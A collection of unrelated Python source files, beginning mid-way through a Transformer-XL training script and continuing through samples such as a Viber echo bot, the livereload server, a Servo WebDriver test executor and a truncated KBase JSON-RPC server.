hidden = hidden_end.cuda(GPUS[0]) hidden = Variable(hidden.data) ret = model.forward_end(hidden, target, *mems_end_eval) loss, mems_end_eval = ret[0], ret[1:] loss = loss.mean() total_loss += seq_len * loss.float().item() total_len += seq_len # Switch back to the training mode model.reset_length(args.tgt_len, args.ext_len, args.mem_len) model.train() val_loss = total_loss / total_len logging('-' * 100) log_str = '| Eval {:3d} at step {:>8d} | time: {:5.2f}s ' \ '| valid loss {:5.2f}'.format( train_step // args.eval_interval, train_step, (time.time() - eval_start_time), val_loss) if args.dataset in ['enwik8', 'text8']: log_str += ' | bpc {:9.5f}'.format(val_loss / math.log(2)) else: log_str += ' | valid ppl {:9.3f}'.format(math.exp(val_loss)) logging(log_str) logging('-' * 100) # Save the model if the validation loss is the best we've seen so far. if not best_val_loss or val_loss < best_val_loss: if not args.debug: with open(os.path.join(args.work_dir, 'model_0.pt'), 'wb') as f: torch.save(model, f) with open(os.path.join(args.work_dir, 'optimizer_0.pt'), 'wb') as f: torch.save(optimizer.state_dict(), f) best_val_loss = val_loss # dev-performance based learning rate annealing if args.scheduler == 'dev_perf': scheduler.step(val_loss) eval_start_time = time.time() if train_step == args.max_step: break if train_step == args.max_step: break if __name__ == '__main__': try: mp.set_start_method('spawn') except RuntimeError: pass parser = argparse.ArgumentParser(description='PyTorch Transformer Language Model') parser.add_argument('--data', type=str, default='../data/wikitext-103', help='location of the data corpus') parser.add_argument('--dataset', type=str, default='wt103', choices=['wt103', 'lm1b', 'enwik8', 'text8'], help='dataset name') parser.add_argument('--num_splits', type=int, default=2, help='number of splits') parser.add_argument('--n_layer', type=int, default=12, help='number of total layers') parser.add_argument('--n_head', type=int, default=10, help='number of heads') parser.add_argument('--d_head', type=int, default=50, help='head dimension') parser.add_argument('--d_embed', type=int, default=-1, help='embedding dimension') parser.add_argument('--d_model', type=int, default=500, help='model dimension') parser.add_argument('--d_inner', type=int, default=1000, help='inner dimension in FF') parser.add_argument('--dropout', type=float, default=0.0, help='global dropout rate') parser.add_argument('--dropatt', type=float, default=0.0, help='attention probability dropout rate') parser.add_argument('--init', default='normal', type=str, help='parameter initializer to use.') parser.add_argument('--emb_init', default='normal', type=str, help='parameter initializer to use.') parser.add_argument('--init_range', type=float, default=0.1, help='parameters initialized by U(-init_range, init_range)') parser.add_argument('--emb_init_range', type=float, default=0.01, help='parameters initialized by U(-init_range, init_range)') parser.add_argument('--init_std', type=float, default=0.02, help='parameters initialized by N(0, init_std)') parser.add_argument('--proj_init_std', type=float, default=0.01, help='parameters initialized by N(0, init_std)') parser.add_argument('--optim', default='adam', type=str, choices=['adam', 'sgd', 'adagrad'], help='optimizer to use.') parser.add_argument('--lr', type=float, default=0.00025, help='initial learning rate (0.00025|5 for adam|sgd)') parser.add_argument('--mom', type=float, default=0.0, help='momentum for sgd') parser.add_argument('--scheduler', default='cosine', type=str, choices=['cosine', 'inv_sqrt', 'dev_perf', 'constant'], help='lr scheduler to use.') parser.add_argument('--warmup_step', type=int, default=0, help='upper epoch limit') parser.add_argument('--decay_rate', type=float, default=0.5, help='decay factor when ReduceLROnPlateau is used') parser.add_argument('--lr_min', type=float, default=0.0, help='minimum learning rate during annealing') parser.add_argument('--clip', type=float, default=0.25, help='gradient clipping') parser.add_argument('--clip_nonemb', action='store_true', help='only clip the gradient of non-embedding params') parser.add_argument('--max_step', type=int, default=100000, help='upper epoch limit') parser.add_argument('--batch_size', type=int, default=60, help='batch size') parser.add_argument('--batch_chunk', type=int, default=1, help='split batch into chunks to save memory') parser.add_argument('--tgt_len', type=int, default=70, help='number of tokens to predict') parser.add_argument('--eval_tgt_len', type=int, default=50, help='number of tokens to predict for evaluation') parser.add_argument('--ext_len', type=int, default=0, help='length of the extended context') parser.add_argument('--mem_len', type=int, default=0, help='length of the retained previous heads') parser.add_argument('--not_tied', action='store_true', help='do not tie the word embedding and softmax weights') parser.add_argument('--seed', type=int, default=1111, help='random seed') parser.add_argument('--cuda', action='store_true', help='use CUDA') parser.add_argument('--adaptive', action='store_true', help='use adaptive softmax') parser.add_argument('--div_val', type=int, default=1, help='divident value for adapative input and softmax') parser.add_argument('--pre_lnorm', action='store_true', help='apply LayerNorm to the input instead of the output') parser.add_argument('--varlen', action='store_true', help='use variable length') parser.add_argument('--multi_gpu', action='store_true', help='use multiple GPU') parser.add_argument('--log-interval', type=int, default=200, help='report interval') parser.add_argument('--eval-interval', type=int, default=4000, help='evaluation interval') parser.add_argument('--work_dir', default='LM-TFM', type=str, help='experiment directory.') parser.add_argument('--restart', action='store_true', help='restart training from the saved checkpoint') parser.add_argument('--restart_dir', type=str, default='', help='restart dir') parser.add_argument('--debug', action='store_true', help='run in debug mode (do not create exp dir)') parser.add_argument('--same_length', action='store_true', help='use the same attn length for all tokens') parser.add_argument('--attn_type', type=int, default=0, help='attention type. 0 for ours, 1 for Shaw et al,' '2 for Vaswani et al, 3 for Al Rfou et al.') parser.add_argument('--clamp_len', type=int, default=-1, help='use the same pos embeddings after clamp_len') parser.add_argument('--eta_min', type=float, default=0.0, help='min learning rate for cosine scheduler') parser.add_argument('--gpu0_bsz', type=int, default=-1, help='batch size on gpu 0') parser.add_argument('--max_eval_steps', type=int, default=-1, help='max eval steps') parser.add_argument('--sample_softmax', type=int, default=-1, help='number of samples in sampled softmax') parser.add_argument('--patience', type=int, default=0, help='patience') parser.add_argument('--finetune_v2', action='store_true', help='finetune v2') parser.add_argument('--finetune_v3', action='store_true', help='finetune v3') parser.add_argument('--fp16', action='store_true', help='Run in pseudo-fp16 mode (fp16 storage fp32 math).') parser.add_argument('--static-loss-scale', type=float, default=1, help='Static loss scale, positive power of 2 values can ' 'improve fp16 convergence.') parser.add_argument('--dynamic-loss-scale', action='store_true', help='Use dynamic loss scaling. If supplied, this argument' ' supersedes --static-loss-scale.') args = parser.parse_args() args.tied = not args.not_tied if args.d_embed < 0: args.d_embed = args.d_model assert args.ext_len >= 0, 'extended context length must be non-negative' assert args.batch_size % args.batch_chunk == 0 args.work_dir = '{}-{}'.format(args.work_dir, args.dataset) args.work_dir = os.path.join(args.work_dir, time.strftime('%Y%m%d-%H%M%S')) logging = create_exp_dir(args.work_dir, scripts_to_save=['train.py', 'mem_transformer.py'], debug=args.debug) # Set the random seed manually for reproducibility. np.random.seed(args.seed) torch.manual_seed(args.seed) if torch.cuda.is_available(): if not args.cuda: print('WARNING: You have a CUDA device, so you should probably run with --cuda') else: torch.cuda.manual_seed_all(args.seed) # Validate `--fp16` option if args.fp16: if not args.cuda: print('WARNING: --fp16 requires --cuda, ignoring --fp16 option') args.fp16 = False else: try: from apex.fp16_utils import FP16_Optimizer except: print('WARNING: apex not installed, ignoring --fp16 option') args.fp16 = False main(args, logging)
example3.py
import multiprocessing as mp import random import string random.seed(123) # define a example function def rand_string(length, output): """ Generates a random string of numbers, lower- and uppercase chars. """ rand_str = ''.join(random.choice( string.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(length)) output.put(rand_str) def rand_string2(length): """ Generates a random string of numbers, lower- and uppercase chars. """ rand_str = ''.join(random.choice( string.ascii_lowercase + string.ascii_uppercase + string.digits) for i in range(length)) return rand_str if __name__ == "__main__": # ================= Process ================= print('Started') # Define an output queue output = mp.Queue() # Setup a list of processes that we want to run processes = [mp.Process(target=rand_string, args=(5, output)) for x in range(4)] # Run processes for p in processes: p.start() # Exit the completed processes for p in processes: p.join() # Get process results from the output queue results = [output.get() for p in processes] print('Process results: ', results) # ================= Pool ====================== pool = mp.Pool(processes=4) results = [pool.apply(rand_string2, args=(x, )) for x in range(1,7)] print('Pool results: ', results) print('End')
main.py
import socket import threading import time import struct import rlp from secp256k1 import PrivateKey from ipaddress import ip_address import hashlib import _pysha3 # from _pysha3 import keccak_256 import math def keccak256(s): k = _pysha3.keccak_256() k.update(s) return k.digest() class EndPoint(object): def __init__(self, address, udpPort, tcpPort): self.address = ip_address(address) self.udpPort = udpPort self.tcpPort = tcpPort def pack(self): return [self.address.packed, struct.pack(">H", self.udpPort), struct.pack(">H", self.tcpPort)] class PingNode(object): packet_type = bytes([1]); version = '\x03'; def __init__(self, endpoint_from, endpoint_to): self.endpoint_from = endpoint_from self.endpoint_to = endpoint_to def pack(self): return [self.version, self.endpoint_from.pack(), self.endpoint_to.pack(), struct.pack(">I", math.ceil(time.time()) + 60)] class PingServer(object): def __init__(self, my_endpoint): self.endpoint = my_endpoint priv_key_file = open('priv_key', 'r') priv_key_serialized = priv_key_file.read() priv_key_file.close() self.priv_key = PrivateKey() self.priv_key.deserialize(priv_key_serialized) self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.sock.bind(('0.0.0.0', self.endpoint.udpPort)) def wrap_packet(self, packet): payload = packet.packet_type + rlp.encode(packet.pack()) sig = self.priv_key.ecdsa_sign_recoverable(keccak256(payload), raw = True) sig_serialized = self.priv_key.ecdsa_recoverable_serialize(sig) payload = sig_serialized[0] + bytes(sig_serialized[1]) + payload payload_hash = keccak256(payload) return payload_hash + payload def udp_listen(self): def receive_ping(): print("listening...") data, addr = self.sock.recvfrom(1024) print("received message[", addr, "]") return threading.Thread(target = receive_ping) def ping(self, endpoint): ping = PingNode(self.endpoint, endpoint) message = self.wrap_packet(ping) print("sending ping.") self.sock.sendto(message, (endpoint.address.exploded, endpoint.udpPort)) my_endpoint = EndPoint(u'127.0.0.1', 30302, 30302) their_endpoint = EndPoint(u'127.0.0.1', 30301, 30301) server = PingServer(my_endpoint) listen_thread = server.udp_listen() listen_thread.start() server.ping(their_endpoint)
sample_bot.py
from flask import Flask, request, Response from viberbot import Api from viberbot.api.bot_configuration import BotConfiguration from viberbot.api.messages.text_message import TextMessage from viberbot.api.viber_requests import ViberConversationStartedRequest from viberbot.api.viber_requests import ViberFailedRequest from viberbot.api.viber_requests import ViberMessageRequest from viberbot.api.viber_requests import ViberSubscribedRequest from viberbot.api.viber_requests import ViberUnsubscribedRequest import time import logging import sched import threading logger = logging.getLogger() logger.setLevel(logging.DEBUG) handler = logging.StreamHandler() formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s') handler.setFormatter(formatter) logger.addHandler(handler) app = Flask(__name__) viber = Api(BotConfiguration( name='PythonSampleBot', avatar='http://viber.com/avatar.jpg', auth_token='YOUR_AUTH_TOKEN_HERE' )) @app.route('/', methods=['POST']) def incoming(): logger.debug("received request. post data: {0}".format(request.get_data())) viber_request = viber.parse_request(request.get_data().decode('utf8')) if isinstance(viber_request, ViberMessageRequest): message = viber_request.message viber.send_messages(viber_request.sender.id, [ message ]) elif isinstance(viber_request, ViberConversationStartedRequest) \ or isinstance(viber_request, ViberSubscribedRequest) \ or isinstance(viber_request, ViberUnsubscribedRequest): viber.send_messages(viber_request.sender.id, [ TextMessage(None, None, viber_request.get_event_type()) ]) elif isinstance(viber_request, ViberFailedRequest): logger.warn("client failed receiving message. failure: {0}".format(viber_request)) return Response(status=200) def set_webhook(viber): viber.set_webhook('https://mybotwebserver.com:8443/') if __name__ == "__main__": scheduler = sched.scheduler(time.time, time.sleep) scheduler.enter(5, 1, set_webhook, (viber,)) t = threading.Thread(target=scheduler.run) t.start() context = ('server.crt', 'server.key') app.run(host='0.0.0.0', port=8443, debug=True, ssl_context=context)
mousemover.py
#!/usr/bin/env python3 # -*- coding: utf-8 -*- __author__ = "luk6xff" __date__ = "01.02.2022" # Mouse and Keyboard controlers from pynput.mouse import Controller as MouseController from pynput.keyboard import Listener as KeyboardListener # Sleep wait from time import sleep import threading import random class MouseMover(): def __init__(self): self.mouse = MouseController() self.keyboard = KeyboardListener(on_press=self.on_press_key, on_release=self.on_release_key) self.app_running = True self.init_keyboard() self.init_mouse() def stop_mouse_running(self): print("stop mouse_running") self.mouse_running = False def start_mouse_running(self): print("start mouse_running") self.mouse_running = True def stop_all(self): print("stopping all!") self.app_running = False self.keyboard.stop() def mouse_run(self): while self.app_running: if self.mouse_running == True: v = (-10, 10) l = lambda x : random.randint(x[0], x[1]) # Move pointer relative to current position self.mouse.move(l(v), l(v)) # Scroll a few random steps down self.mouse.scroll(l(v), l(v)) sleep(1) else: sleep(1) def on_press_key(self, key_name): try: key_name = str(key_name).strip('\'') #print("key_name pressed: ", key_name) if key_name in self.keys: key_hndl = self.keys[key_name] key_hndl() except AttributeError: print("Special Key {} pressed".format(key_name)) def on_release_key(self, key_name): key_name = str(key_name).strip('\'') #print("key_name {} released".format(key_name)) def init_keyboard(self): self.keys = { 'p': self.start_mouse_running, 'w': self.stop_mouse_running, 'q': self.stop_all } self.keyboard.start() #self.keyboard.join() def init_mouse(self): self.start_mouse_running() self.mouse_thread = threading.Thread(target=self.mouse_run) self.mouse_thread.start() self.mouse_thread.join() if __name__ == "__main__": mm = MouseMover()
server.py
# -*- coding: utf-8 -*- """ livereload.server ~~~~~~~~~~~~~~~~~ WSGI app server for livereload. :copyright: (c) 2013 - 2015 by Hsiaoming Yang :license: BSD, see LICENSE for more details. """ import os import time import shlex import logging import threading import webbrowser from subprocess import Popen, PIPE from tornado.wsgi import WSGIContainer from tornado.ioloop import IOLoop from tornado.autoreload import add_reload_hook from tornado import web from tornado import escape from tornado import httputil from tornado.log import LogFormatter from .handlers import LiveReloadHandler, LiveReloadJSHandler from .handlers import ForceReloadHandler, StaticFileHandler from .watcher import get_watcher_class from six import string_types, PY3 logger = logging.getLogger('livereload') HEAD_END = b'</head>' def shell(cmd, output=None, mode='w', cwd=None, shell=False): """Execute a shell command. You can add a shell command:: server.watch( 'style.less', shell('lessc style.less', output='style.css') ) :param cmd: a shell command, string or list :param output: output stdout to the given file :param mode: only works with output, mode ``w`` means write, mode ``a`` means append :param cwd: set working directory before command is executed. :param shell: if true, on Unix the executable argument specifies a replacement shell for the default ``/bin/sh``. """ if not output: output = os.devnull else: folder = os.path.dirname(output) if folder and not os.path.isdir(folder): os.makedirs(folder) if not isinstance(cmd, (list, tuple)) and not shell: cmd = shlex.split(cmd) def run_shell(): try: p = Popen(cmd, stdin=PIPE, stdout=PIPE, stderr=PIPE, cwd=cwd, shell=shell) except OSError as e: logger.error(e) if e.errno == os.errno.ENOENT: # file (command) not found logger.error("maybe you haven't installed %s", cmd[0]) return e stdout, stderr = p.communicate() if stderr: logger.error(stderr) return stderr #: stdout is bytes, decode for python3 if PY3: stdout = stdout.decode() with open(output, mode) as f: f.write(stdout) return run_shell class LiveScriptInjector(web.OutputTransform): def __init__(self, request): super(LiveScriptInjector, self).__init__(request) def transform_first_chunk(self, status_code, headers, chunk, finishing): if HEAD_END in chunk: chunk = chunk.replace(HEAD_END, self.script + HEAD_END) if 'Content-Length' in headers: length = int(headers['Content-Length']) + len(self.script) headers['Content-Length'] = str(length) return status_code, headers, chunk class LiveScriptContainer(WSGIContainer): def __init__(self, wsgi_app, script=''): self.wsgi_app = wsgi_app self.script = script def __call__(self, request): data = {} response = [] def start_response(status, response_headers, exc_info=None): data["status"] = status data["headers"] = response_headers return response.append app_response = self.wsgi_app( WSGIContainer.environ(request), start_response) try: response.extend(app_response) body = b"".join(response) finally: if hasattr(app_response, "close"): app_response.close() if not data: raise Exception("WSGI app did not call start_response") status_code, reason = data["status"].split(' ', 1) status_code = int(status_code) headers = data["headers"] header_set = set(k.lower() for (k, v) in headers) body = escape.utf8(body) if HEAD_END in body: body = body.replace(HEAD_END, self.script + HEAD_END) if status_code != 304: if "content-type" not in header_set: headers.append(("Content-Type", "application/octet-stream; charset=UTF-8")) if "content-length" not in header_set: headers.append(("Content-Length", str(len(body)))) if "server" not in header_set: headers.append(("Server", "LiveServer")) start_line = httputil.ResponseStartLine( "HTTP/1.1", status_code, reason ) header_obj = httputil.HTTPHeaders() for key, value in headers: if key.lower() == 'content-length': value = str(len(body)) header_obj.add(key, value) request.connection.write_headers(start_line, header_obj, chunk=body) request.connection.finish() self._log(status_code, request) class Server(object): """Livereload server interface. Initialize a server and watch file changes:: server = Server(wsgi_app) server.serve() :param app: a wsgi application instance :param watcher: A Watcher instance, you don't have to initialize it by yourself. Under Linux, you will want to install pyinotify and use INotifyWatcher() to avoid wasted CPU usage. """ def __init__(self, app=None, watcher=None): self.root = None self.app = app if not watcher: watcher_cls = get_watcher_class() watcher = watcher_cls() self.watcher = watcher def watch(self, filepath, func=None, delay=None, ignore=None): """Add the given filepath for watcher list. Once you have intialized a server, watch file changes before serve the server:: server.watch('static/*.stylus', 'make static') def alert(): print('foo') server.watch('foo.txt', alert) server.serve() :param filepath: files to be watched, it can be a filepath, a directory, or a glob pattern :param func: the function to be called, it can be a string of shell command, or any callable object without parameters :param delay: Delay sending the reload message. Use 'forever' to not send it. This is useful to compile sass files to css, but reload on changed css files then only. :param ignore: A function return True to ignore a certain pattern of filepath. """ if isinstance(func, string_types): cmd = func func = shell(func) func.repr_str = "shell: {}".format(cmd) elif func: func.repr_str = str(func) self.watcher.watch(filepath, func, delay, ignore=ignore) def application(self, port, host, liveport=None, debug=None, live_css=True, override_port=None): LiveReloadHandler.watcher = self.watcher LiveReloadHandler.live_css = live_css if liveport is None: liveport = port client_port = override_port or liveport or port if debug is None and self.app: debug = True live_handlers = [ (r'/livereload', LiveReloadHandler), (r'/forcereload', ForceReloadHandler), (r'/livereload.js', LiveReloadJSHandler) ] # The livereload.js snippet. # Uses JavaScript to dynamically inject the client's hostname. # This allows for serving on 0.0.0.0. live_reload_path = ":{port}/livereload.js?port={port}".format(port=client_port) if client_port == 80 or client_port == 443: live_reload_path = "/livereload.js?port={port}".format(port=client_port) live_script = escape.utf8(( '<script type="text/javascript">' 'document.write("<script src=''//"' ' + window.location.hostname + "{path}''>' ' </"+"script>");' '</script>' ).format(path=live_reload_path)) web_handlers = self.get_web_handlers(live_script) class ConfiguredTransform(LiveScriptInjector): script = live_script if liveport == port: handlers = live_handlers + web_handlers app = web.Application( handlers=handlers, debug=debug, transforms=[ConfiguredTransform] ) app.listen(port, address=host) else: app = web.Application( handlers=web_handlers, debug=debug, transforms=[ConfiguredTransform] ) app.listen(port, address=host) live = web.Application(handlers=live_handlers, debug=False) live.listen(liveport, address=host) def get_web_handlers(self, script): if self.app: fallback = LiveScriptContainer(self.app, script) return [(r'.*', web.FallbackHandler, {'fallback': fallback})] return [ (r'/(.*)', StaticFileHandler, { 'path': self.root or '.', 'default_filename': 'index.html', }), ] def serve(self, port=5500, liveport=None, host=None, root=None, debug=None, open_url=False, restart_delay=2, open_url_delay=None, live_css=True, override_port=None): """Start serve the server with the given port. :param port: serve on this port, default is 5500 :param liveport: live reload on this port :param host: serve on this hostname, default is 127.0.0.1 :param root: serve static on this root directory :param debug: set debug mode, which autoreloads the app on code changes via Tornado (and causes polling). Defaults to True when ``self.app`` is set, otherwise False. :param open_url_delay: open webbrowser after the delay seconds :param live_css: whether to use live css or force reload on css. Defaults to True :param override_port: serving port is different from client-side """ host = host or '127.0.0.1' if root is not None: self.root = root self._setup_logging() logger.info('Serving on http://%s:%s' % (host, port)) self.application(port, host, liveport=liveport, debug=debug, live_css=live_css, override_port=override_port) # Async open web browser after 5 sec timeout if open_url or open_url_delay: if open_url: logger.warn('Use `open_url_delay` instead of `open_url`') sleep = open_url_delay or 5 def opener(): time.sleep(sleep) webbrowser.open('http://%s:%s' % (host, port)) threading.Thread(target=opener).start() try: self.watcher._changes.append(('__livereload__', restart_delay)) LiveReloadHandler.start_tasks() add_reload_hook(lambda: IOLoop.instance().close(all_fds=True)) IOLoop.instance().start() except KeyboardInterrupt: logger.info('Shutting down...') def _setup_logging(self): logger.setLevel(logging.INFO) channel = logging.StreamHandler() channel.setFormatter(LogFormatter()) logger.addHandler(channel) # need a tornado logging handler to prevent IOLoop._setup_logging logging.getLogger('tornado').addHandler(channel)
scheduler.py
import time import threading import logging import importlib import schedule log = logging.getLogger(__name__) log.setLevel("DEBUG") class Scheduler: """Create thread for scheduler to run""" def __init__(self, sequencer, config) -> None: self.sequencer = sequencer self.schedules = {} self.config = config self.active = False self.thread = None self._importSchedules() def getSchedules(self): return self.config def getActiveSchedules(self): jobs = {} for s in self.schedules: jobs[s] = self.schedules[s].getJobs() return jobs def start(self, schedule_name: str, function_name: str): """Start schedule""" if schedule_name not in self.schedules: return False if not self.schedules[schedule_name].hasFunction(function_name): return False self.schedules[schedule_name].start(function_name) return True def stop(self, schedule_name: str, function_name: str): """Stops schedule""" if schedule_name not in self.schedules: return False if not self.schedules[schedule_name].hasFunction(function_name): return False return self.schedules[schedule_name].stop(function_name) @staticmethod def _schedule_thread(): while True: try: schedule.run_pending() except: log.error(f"Exception on scheduled task") time.sleep(1) def _importSchedules(self): for s in self.config["schedules"]: mod = importlib.import_module(s["module"]) sched = mod.ScheduleFunction(schedule, self.sequencer, s) self.schedules[s["name"]] = sched def start_thread(self): if not self.active: self.thread = threading.Thread(target=self._schedule_thread) self.thread.setDaemon(True) self.thread.start()
executorservodriver.py
import json import os import socket import threading import time import traceback from .base import (Protocol, BaseProtocolPart, RefTestExecutor, RefTestImplementation, TestharnessExecutor, strip_server) from ..testrunner import Stop from ..webdriver_server import wait_for_service webdriver = None ServoCommandExtensions = None here = os.path.join(os.path.split(__file__)[0]) extra_timeout = 5 def do_delayed_imports(): global webdriver import webdriver global ServoCommandExtensions class ServoCommandExtensions(object): def __init__(self, session): self.session = session @webdriver.client.command def get_prefs(self, *prefs): body = {"prefs": list(prefs)} return self.session.send_session_command("POST", "servo/prefs/get", body) @webdriver.client.command def set_prefs(self, prefs): body = {"prefs": prefs} return self.session.send_session_command("POST", "servo/prefs/set", body) @webdriver.client.command def reset_prefs(self, *prefs): body = {"prefs": list(prefs)} return self.session.send_session_command("POST", "servo/prefs/reset", body) def change_prefs(self, old_prefs, new_prefs): # Servo interprets reset with an empty list as reset everything if old_prefs: self.reset_prefs(*old_prefs.keys()) self.set_prefs({k: parse_pref_value(v) for k, v in new_prefs.items()}) # See parse_pref_from_command_line() in components/config/opts.rs def parse_pref_value(value): if value == "true": return True if value == "false": return False try: return float(value) except ValueError: return value class ServoBaseProtocolPart(BaseProtocolPart): def execute_script(self, script, async=False): pass def set_timeout(self, timeout): pass def wait(self): pass def set_window(self, handle): pass class ServoWebDriverProtocol(Protocol): implements = [ServoBaseProtocolPart] def __init__(self, executor, browser, capabilities, **kwargs): do_delayed_imports() Protocol.__init__(self, executor, browser) self.capabilities = capabilities self.host = browser.webdriver_host self.port = browser.webdriver_port self.init_timeout = browser.init_timeout self.session = None def connect(self): """Connect to browser via WebDriver.""" wait_for_service((self.host, self.port), timeout=self.init_timeout) self.session = webdriver.Session(self.host, self.port, extension=ServoCommandExtensions) self.session.start() def after_connect(self): pass def teardown(self): self.logger.debug("Hanging up on WebDriver session") try: self.session.end() except Exception: pass def is_alive(self): try: # Get a simple property over the connection self.session.window_handle # TODO what exception? except Exception: return False return True def wait(self): while True: try: self.session.execute_async_script("") except webdriver.TimeoutException: pass except (socket.timeout, IOError): break except Exception as e: self.logger.error(traceback.format_exc(e)) break class ServoWebDriverRun(object): def __init__(self, func, session, url, timeout, current_timeout=None): self.func = func self.result = None self.session = session self.url = url self.timeout = timeout self.result_flag = threading.Event() def run(self): executor = threading.Thread(target=self._run) executor.start() flag = self.result_flag.wait(self.timeout + extra_timeout) if self.result is None: assert not flag self.result = False, ("EXTERNAL-TIMEOUT", None) return self.result def _run(self): try: self.result = True, self.func(self.session, self.url, self.timeout) except webdriver.TimeoutException: self.result = False, ("EXTERNAL-TIMEOUT", None) except (socket.timeout, IOError): self.result = False, ("CRASH", None) except Exception as e: message = getattr(e, "message", "") if message: message += "\n" message += traceback.format_exc(e) self.result = False, ("INTERNAL-ERROR", e) finally: self.result_flag.set() def timeout_func(timeout): if timeout: t0 = time.time() return lambda: time.time() - t0 > timeout + extra_timeout else: return lambda: False class ServoWebDriverTestharnessExecutor(TestharnessExecutor): def __init__(self, browser, server_config, timeout_multiplier=1, close_after_done=True, capabilities=None, debug_info=None, **kwargs): TestharnessExecutor.__init__(self, browser, server_config, timeout_multiplier=1, debug_info=None) self.protocol = ServoWebDriverProtocol(self, browser, capabilities=capabilities) with open(os.path.join(here, "testharness_servodriver.js")) as f: self.script = f.read() self.timeout = None def on_protocol_change(self, new_protocol): pass def is_alive(self): return self.protocol.is_alive() def do_test(self, test): url = self.test_url(test) timeout = test.timeout * self.timeout_multiplier + extra_timeout if timeout != self.timeout: try: self.protocol.session.timeouts.script = timeout self.timeout = timeout except IOError: self.logger.error("Lost webdriver connection") return Stop success, data = ServoWebDriverRun(self.do_testharness, self.protocol.session, url, timeout).run() if success: return self.convert_result(test, data) return (test.result_cls(*data), []) def do_testharness(self, session, url, timeout): session.url = url result = json.loads( session.execute_async_script( self.script % {"abs_url": url, "url": strip_server(url), "timeout_multiplier": self.timeout_multiplier, "timeout": timeout * 1000})) # Prevent leaking every page in history until Servo develops a more sane # page cache session.back() return result def on_environment_change(self, new_environment): self.protocol.session.extension.change_prefs( self.last_environment.get("prefs", {}), new_environment.get("prefs", {}) ) class TimeoutError(Exception): pass class ServoWebDriverRefTestExecutor(RefTestExecutor): def __init__(self, browser, server_config, timeout_multiplier=1, screenshot_cache=None, capabilities=None, debug_info=None, **kwargs): """Selenium WebDriver-based executor for reftests""" RefTestExecutor.__init__(self, browser, server_config, screenshot_cache=screenshot_cache, timeout_multiplier=timeout_multiplier, debug_info=debug_info) self.protocol = ServoWebDriverProtocol(self, browser, capabilities=capabilities) self.implementation = RefTestImplementation(self) self.timeout = None with open(os.path.join(here, "reftest-wait_webdriver.js")) as f: self.wait_script = f.read() def is_alive(self): return self.protocol.is_alive() def do_test(self, test): try: result = self.implementation.run_test(test) return self.convert_result(test, result) except IOError: return test.result_cls("CRASH", None), [] except TimeoutError: return test.result_cls("TIMEOUT", None), [] except Exception as e: message = getattr(e, "message", "") if message: message += "\n" message += traceback.format_exc(e) return test.result_cls("INTERNAL-ERROR", message), [] def screenshot(self, test, viewport_size, dpi): # https://github.com/w3c/wptrunner/issues/166 assert viewport_size is None assert dpi is None timeout = (test.timeout * self.timeout_multiplier + extra_timeout if self.debug_info is None else None) if self.timeout != timeout: try: self.protocol.session.timeouts.script = timeout self.timeout = timeout except IOError: self.logger.error("Lost webdriver connection") return Stop return ServoWebDriverRun(self._screenshot, self.protocol.session, self.test_url(test), timeout).run() def _screenshot(self, session, url, timeout): session.url = url session.execute_async_script(self.wait_script) return session.screenshot() def on_environment_change(self, new_environment): self.protocol.session.extension.change_prefs( self.last_environment.get("prefs", {}), new_environment.get("prefs", {}) )
MotifFinderSamplerServer.py
#!/usr/bin/env python # -*- coding: utf-8 -*- import datetime import json import os import random as _random import sys import traceback from getopt import getopt, GetoptError from multiprocessing import Process from os import environ from wsgiref.simple_server import make_server import requests as _requests from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError, \ JSONRPCError, InvalidRequestError from jsonrpcbase import ServerError as JSONServerError from biokbase import log from MotifFinderSampler.authclient import KBaseAuth as _KBaseAuth try: from ConfigParser import ConfigParser except ImportError: from configparser import ConfigParser DEPLOY = 'KB_DEPLOYMENT_CONFIG' SERVICE = 'KB_SERVICE_NAME' AUTH = 'auth-service-url' # Note that the error fields do not match the 2.0 JSONRPC spec def get_config_file(): return environ.get(DEPLOY, None) def get_service_name(): return environ.get(SERVICE, None) def get_config(): if not get_config_file(): return None retconfig = {} config = ConfigParser() config.read(get_config_file()) for nameval in config.items(get_service_name() or 'MotifFinderSampler'): retconfig[nameval[0]] = nameval[1] return retconfig config = get_config() from MotifFinderSampler.MotifFinderSamplerImpl import MotifFinderSampler # noqa @IgnorePep8 impl_MotifFinderSampler = MotifFinderSampler(config) class JSONObjectEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, set): return list(obj) if isinstance(obj, frozenset): return list(obj) if hasattr(obj, 'toJSONable'): return obj.toJSONable() return json.JSONEncoder.default(self, obj) class JSONRPCServiceCustom(JSONRPCService): def call(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in a JSON string or None if there is none. Arguments: jsondata -- remote method call in jsonrpc format """ result = self.call_py(ctx, jsondata) if result is not None: return json.dumps(result, cls=JSONObjectEncoder) return None def _call_method(self, ctx, request): """Calls given method with given params and returns it value.""" method = self.method_data[request['method']]['method'] params = request['params'] result = None try: if isinstance(params, list): # Does it have enough arguments? if len(params) < self._man_args(method) - 1: raise InvalidParamsError('not enough arguments') # Does it have too many arguments? if(not self._vargs(method) and len(params) > self._max_args(method) - 1): raise InvalidParamsError('too many arguments') result = method(ctx, *params) elif isinstance(params, dict): # Do not accept keyword arguments if the jsonrpc version is # not >=1.1. if request['jsonrpc'] < 11: raise KeywordError result = method(ctx, **params) else: # No params result = method(ctx) except JSONRPCError: raise except Exception as e: # log.exception('method %s threw an exception' % request['method']) # Exception was raised inside the method. newerr = JSONServerError() newerr.trace = traceback.format_exc() if len(e.args) == 1: newerr.data = repr(e.args[0]) else: newerr.data = repr(e.args) raise newerr return result def call_py(self, ctx, jsondata): """ Calls jsonrpc service's method and returns its return value in python object format or None if there is none. This method is same as call() except the return value is a python object instead of JSON string. This method is mainly only useful for debugging purposes. """ rdata = jsondata # we already deserialize the json string earlier in the server code, no # need to do it again # try: # rdata = json.loads(jsondata) # except ValueError: # raise ParseError # set some default values for error handling request = self._get_default_vals() if isinstance(rdata, dict) and rdata: # It's a single request. self._fill_request(request, rdata) respond = self._handle_request(ctx, request) # Don't respond to notifications if respond is None: return None return respond elif isinstance(rdata, list) and rdata: # It's a batch. requests = [] responds = [] for rdata_ in rdata: # set some default values for error handling request_ = self._get_default_vals() self._fill_request(request_, rdata_) requests.append(request_) for request_ in requests: respond = self._handle_request(ctx, request_) # Don't respond to notifications if respond is not None: responds.append(respond) if responds: return responds # Nothing to respond. return None else: # empty dict, list or wrong type raise InvalidRequestError def _handle_request(self, ctx, request): """Handles given request and returns 